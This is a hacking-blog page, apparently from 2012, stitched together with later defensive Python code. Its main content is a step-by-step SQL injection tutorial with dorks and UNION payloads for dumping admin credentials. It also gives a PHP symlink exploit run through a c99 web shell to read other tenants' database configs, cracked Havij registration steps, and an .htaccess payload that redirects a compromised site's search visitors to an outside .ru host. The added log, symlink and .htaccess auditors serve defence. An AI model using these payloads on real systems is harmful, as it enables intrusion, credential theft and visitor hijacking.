Design September 2012 ~ EthiCal HaCkeRs
SQL Injection Full Tutorial [Step By Step]


Keywords you need to know
-------------------------------
Characters : ', - 
Comments : /*, --
-------------------------------
Information: "Information_schema" only works for version 5.x and above 

Google Dork that will be used is ->


"inurl:news.php?id="
"inurl:index.php?id="
"inurl:trainers.php?id="
"inurl:buy.php?category="
"news-article.php?id="
"inurl:article.php?ID="

-------------------------First Step-------------------------

 www.target.com/news.php?id=1
--- Add the character ' at the end of the URL to see whether the site is vulnerable to
SQL injection or not.

inject sample code:-

www.target.com/news.php?id=1
or
www.target.com/news.php?id=-1

Examples of error messages :-
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near line 1

warning: mysql_fetch_array(): supplied argument is not a valid MYSQL
result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line

-------------------------Second Step-------------------------

Find the number of tables available in the database.
Add : +order+by+1-- at the end of the URL
Example:

www.target.com/news.php?id=1+order+by+1-- 
or
www.target.com/news.php?id=1+order+by+1/* check in stages
www.target.com/news.php?id=1+order+by+2/*
www.target.com/news.php?id=1+order+by+3/* keep looking until an error comes out

For this tutorial the table amount obtained was 3.

-------------------------Third Step-------------------------

Use the UNION command to bring out the numbers that we will use later.
Command to be used : +union+select+1,2,3-- at the end of the URL


Example
www.target.com/news.php?id=1+union+select+1,2,3--

Example: the number 2 comes out.

Then we enter version() in place of the number (2),

Example:
www.target.com/news.php?id=1+union+select+1,version(),3--

and the version will be displayed in place of the number.
Example:
5.1.47-community-log

------
|info|
------ 

version() = to see the MySQL version used
database() = to see the database name used



-------------------------Fourth Step-------------------------

To see the names of the tables on the site, put
table_name in place of the number that came out earlier -> (2)
+from+information_schema.tables-- ---> put after the last digit.

Example:
www.target.com/news.php?id=1+union+select+1,table_name,3+from+information_schema.tables-- 
or we add the character - in front of the first digit
www.target.com/news.php?id=-1+union+select+1,table_name,3+from+information_schema.tables-- 

-------------------------Fifth Step-------------------------
Bring out all the content that is in the table,

group_concat(table_name) ---> put in place of the number that came out earlier (2)
+from+information_schema.tables+where+table_schema=database()-- ---> Put after the last digit.

Example:

www.target.com/news.php?id=1+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()-- 

-------------------------Sixth Step-------------------------

Bring out the content that is in the TABLE

group_concat(column_name) ---> put in place of the number that came out earlier (2)
+from+information_schema.columns+where+table_name=0xResulOfConvertedTextTableAdmin--

(THE TABLE NAME HAS TO BE CONVERTED TO HEXADECIMAL)

------
|info|
------ 
Websites that can be used to convert the table name to hexadecimal
-----> www.piclist.com/techref/ascii.htm
-----> www.centricle.com/tools/ascii-hex/

As an example we will use the table ADMIN,
and the conversion result is 41444D494E

Example:

www.target.com/news.php?id=1+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x41444D494E-- 

-------------------------Seventh Step-------------------------

Bring out the contents of the results that we managed to get from table Admin

concat_ws(0x3a,"column names contained in the table ADMIN") ---> put in place of the number that came out earlier (2)
+from+Admin-- --> The original column

Example:

www.target.com/news.php?id=1+union+select+1,concat_ws(0x3a,id,username,password),3+from+Admin-- 

And we obtain the username and password admin for the website.


Then You Have to Find The Admin Login :)....

More Short Tutorial:-
http://pastebin.com/pVVjSzhF
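
Seen from the server side, the steps above leave a recognizable trail in the web access log. The following added example (not part of the original tutorial) is a Python sketch that groups requests by client and reports which of the tutorial's stages each client reached; the log lines, addresses and regexes are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# One signature per tutorial step; the regexes are this example's own choices.
STAGES = [
    ("quote_probe",  re.compile(r"'\s*$")),
    ("column_count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("fingerprint",  re.compile(r"\b(?:version|database)\s*\(\s*\)", re.I)),
    ("schema_enum",  re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I)),
    ("data_dump",    re.compile(r"\b(?:group_concat|concat_ws)\s*\(", re.I)),
]
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)

def stages_in(value):
    """Return the stage names whose signature occurs in one decoded parameter value."""
    # Closed /**/ comments and whitespace runs are collapsed so split keywords still match.
    text = re.sub(r"\s+", " ", INLINE_COMMENT.sub(" ", value))
    return {name for name, rx in STAGES if rx.search(text)}

def scan(lines):
    """Map client address -> set of stages seen across its requests."""
    seen = defaultdict(set)
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target = m.groups()
        # parse_qsl percent-decodes and turns '+' into spaces, as the server does.
        for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            seen[ip] |= stages_in(value)
    return {ip: found for ip, found in seen.items() if found}

# Constructed access-log lines (documentation address ranges, hypothetical paths).
SAMPLE = [
    '198.51.100.7 - - [02/Sep/2012:10:00:01 +0000] "GET /news.php?id=1%27 HTTP/1.1" 200 512',
    '198.51.100.7 - - [02/Sep/2012:10:00:09 +0000] "GET /news.php?id=1+order+by+3-- HTTP/1.1" 200 498',
    '198.51.100.7 - - [02/Sep/2012:10:00:30 +0000] "GET /news.php?id=-1+union+select+1,'
    'group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()--'
    ' HTTP/1.1" 200 731',
    '203.0.113.20 - - [02/Sep/2012:10:01:02 +0000] "GET /search.php?q=how+to+order+by+phone HTTP/1.1" 200 2048',
    '192.0.2.33 - - [02/Sep/2012:10:02:11 +0000] "GET /news.php?id=1+UNION/**/SELECT+1,2,3-- HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for ip, found in scan(SAMPLE).items():
        print(ip, sorted(found))
```

A client that walks through several stages in order within a short time is a much stronger signal than any single match, which is why the result is grouped per address.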

Symlinking (Priv8 Exploit) UrduHack Team

Okeah Guy's, Here is the ExpLoiT for everyOne, Enjoy it, It's symlink_open_base_directory exploit.
Happy Symlinking peoples...
Here is download link:-
DOWNLOAD

I sincerely hope, You enjoy this..

Private Symlink (PHP) Exploit Tutorial



+++++++++++++++++++++++++++++++++++++++++++++++++++++++
~*^...Symlink(PHP) Exploit Tutorial...^*~
+++++++++++++++++++++++++++++++++++++++++++++++++++++++

~*^...LEECHERS, DON'T MAKE ANY CHANGES IN THE Tutorial...^*~

First of all, we use the symlink function to make a shortcut for any file or folder we want;
that's why this function will be very useful for us to read any folder or file we want (For More Info Use Google).

Here we are using the shell named "c99" to execute the small PHP code (Eval Code) on the shared hosting server.

The exploit is used to download the victim's database if and only if the victim is on a shared host.


Download the below Shell & Follow the steps.

================================================================
Get Any C99 Shell
================================================================

/Step 1 $ Upload the PHP shell, i.e. Shell.php, to your root path. That is /home/hackerz/public_html .

/Step 2 $ Open the uploaded file. The path will look like

================================================================
http://www.yoursitename.com/shell.php
================================================================


/Step 3 $ Next step is to read carefully the PHP Eval Code below. It's about 10 lines of PHP code.


!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

$filepath='/home/xx/public_html/xx.xx';
$sitepath='/home/xx/public_html/';
$writeblefilepath='myfile.txt';$flib=$sitepath.$writeblefilepath;
@unlink($flib);
symlink($filepath, $flib);
echo readlink($flib) . "\n";
echo "<textarea cols=30 rows=10>".file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/" . $writeblefilepath)."</tex" . "tarea>";
@unlink($flib);

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

/Step 4 $ You should replace (xx) in the upper two lines of the code.

The 1st xx in line one means the target username.

The 2nd xx.xx in line one means the target file's full path; in other words, it's
usually used to read database configuration files to steal their connection information.

xx in line two means your username. "For Eg :- /home/Your_Ass/public_html/configuration.php"

$writeblefilepath is used to enter any writable path on your site; it is also used to do the link process
and write the output. For @unlink you can search for it on php.net .

THE END.....
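
For the hosting side, an added example (not code from the original post): a Python audit that walks an account's web root and reports symlinks whose resolved target lies outside that account's home directory. The directory layout built by `build_demo_tree` and the account names are constructed for the demonstration.

```python
import os

def audit_symlinks(docroot, owner_home=None):
    """Return (link_path, raw_target, resolved_target) for links leaving owner_home."""
    owner_home = os.path.realpath(owner_home or docroot)
    findings = []
    # followlinks=False: linked directories are listed but never descended into.
    for dirpath, dirnames, filenames in os.walk(docroot, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path):
                continue
            resolved = os.path.realpath(path)
            # commonpath compares whole path components, so /home/al is not inside /home/alice.
            if os.path.commonpath([owner_home, resolved]) != owner_home:
                findings.append((path, os.readlink(path), resolved))
    return findings

def build_demo_tree(base):
    """Create a constructed two-account layout containing one cross-account link."""
    alice, bob = os.path.join(base, "alice"), os.path.join(base, "bob")
    for home in (alice, bob):
        os.makedirs(os.path.join(home, "public_html"))
    secret = os.path.join(bob, "public_html", "configuration.php")
    with open(secret, "w") as fh:
        fh.write("<?php /* constructed placeholder */\n")
    own = os.path.join(alice, "notes.txt")
    open(own, "w").close()
    # Link that crosses into another account: should be reported.
    os.symlink(secret, os.path.join(alice, "public_html", "myfile.txt"))
    # Link that stays inside the owner's home: should not be reported.
    os.symlink(own, os.path.join(alice, "public_html", "notes-link.txt"))
    return alice, bob

if __name__ == "__main__":
    import tempfile
    alice_home, _ = build_demo_tree(tempfile.mkdtemp())
    for finding in audit_symlinks(os.path.join(alice_home, "public_html"), alice_home):
        print(finding)
```

A scan of this kind only finds links that are left in place; the snippet above removes its link right after reading, so the lasting control is to run each account's PHP under its own user with configuration files readable only by that user.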

Havij 1.15 Pro Automatic SQL Tool



Havij is a powerful automated SQL injection tool which injects the site automatically. You just have to put in the URL and analyze; Havij finds the vulnerability and finds all the databases of the site, and you will also get admin data to hack a site. Havij is mostly used to hack the admin panel of a site.

Functions
Sql injection : all types of sql injection
Admin finder
Md5 Cracker


How To register

1. havij and Click Register
2. In Name put  Cracked@By.Exidous
3. And in key browse for haijvkey.lic, which is in the same directory as havij 
4. and click Register and enjoy


Put HoAx Malware In WebSite [TuT0rial]


Salam All.
Today I will teach you how to put hoax malware on a website.
Don't ask me how to put real malware :P
Because I don't know

First of all, you need shell./evilz.php
After you get a shell, find the directory "public_html"
Find the .htaccess code.
Paste this code

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://villusoftreit.ru/in.cgi?3 [R=301,L]
RewriteEngine On
ErrorDocument 400 http://villusoftreit.ru/in.cgi?3
ErrorDocument 401 http://villusoftreit.ru/in.cgi?3
ErrorDocument 403 http://villusoftreit.ru/in.cgi?3
ErrorDocument 404 http://villusoftreit.ru/in.cgi?3
ErrorDocument 500 http://villusoftreit.ru/in.cgi?3




Then save, you're done :D!!!!

 Thanks to JinCorn :)
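
For site owners cleaning up after this kind of tampering, an added example (not from the original post): a Python check that flags `.htaccess` rules which redirect to a foreign host only when the visitor arrives from a search engine, and `ErrorDocument` entries pointing off-site. The sample file, host names and the `own_hosts` parameter are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit

DIRECTIVE = re.compile(r"^\s*(RewriteCond|RewriteRule|ErrorDocument)\s+(.*)$", re.I)

def external_host(token, own_hosts):
    """Return the host of an absolute http(s) URL that is not one of the site's own."""
    parts = urlsplit(token.strip('"'))
    if parts.scheme in ("http", "https") and parts.hostname:
        host = parts.hostname.lower()
        if not any(host == h or host.endswith("." + h) for h in own_hosts):
            return host
    return None

def audit_htaccess(text, own_hosts):
    """Return (line_no, kind, host) for referer-gated redirects and off-site error pages."""
    findings, referer_cond = [], False
    for no, raw in enumerate(text.splitlines(), 1):
        m = DIRECTIVE.match(raw)
        if not m:
            continue
        name, args = m.group(1).lower(), m.group(2).split()
        if name == "rewritecond":
            # Conditions accumulate until the next RewriteRule consumes them.
            referer_cond |= bool(args) and "HTTP_REFERER" in args[0].upper()
        elif name == "rewriterule":
            host = external_host(args[1], own_hosts) if len(args) > 1 else None
            if host:
                kind = "referer-gated-redirect" if referer_cond else "external-redirect"
                findings.append((no, kind, host))
            referer_cond = False
        elif name == "errordocument" and len(args) > 1:
            host = external_host(args[1], own_hosts)
            if host:
                findings.append((no, "external-errordocument", host))
    return findings

# Constructed .htaccess content; redirector.example.net stands in for a foreign host.
SAMPLE = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*
RewriteRule ^(.*)$ http://redirector.example.net/in.cgi?3 [R=301,L]
ErrorDocument 404 http://redirector.example.net/in.cgi?3
ErrorDocument 403 /errors/403.html
RewriteRule ^old/(.*)$ https://www.example.org/new/$1 [R=301,L]
"""
```

Because the redirect fires only for visitors arriving from a search engine, the owner browsing the site directly sees nothing wrong; reading the file itself, or requesting a page with a search-engine referer, is what exposes it.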

1337 Admin PaneL Finder

  • It uses keywords in 10 languages
  • Choice of response time
  • Choice of user agent
  • Choice of page source code
  • Mix list by ~ codex ~ includes php and asp paths
  • New method. What is this:
  • Here I will dwell a bit, because no other admin page finder does something similar. It was just an idea that was implemented
  • A smart administrator changes the default login url
  • Example from a http://localhost.gr/administrator/ to http://administrator.localhost.gr/
  • Thus makes it impossible to find using a simple admin page finder
  • The new method does just that. It takes url http://www.localhost.gr
  • Make the split and join http://www adding the path between http://www and localhost.gr forming the url http://administrator.localhost.gr/
  • shows user ip
  • shows site ip
  • shows reverse dns
  • Redirect to online IP reverser
  • shows sites hosted on the same ip
  • shows robots.txt if it can be read
  • shows results found
  • shows Result not found

Whmcs And Cpanel BruteForcer [By Ghost-Dz]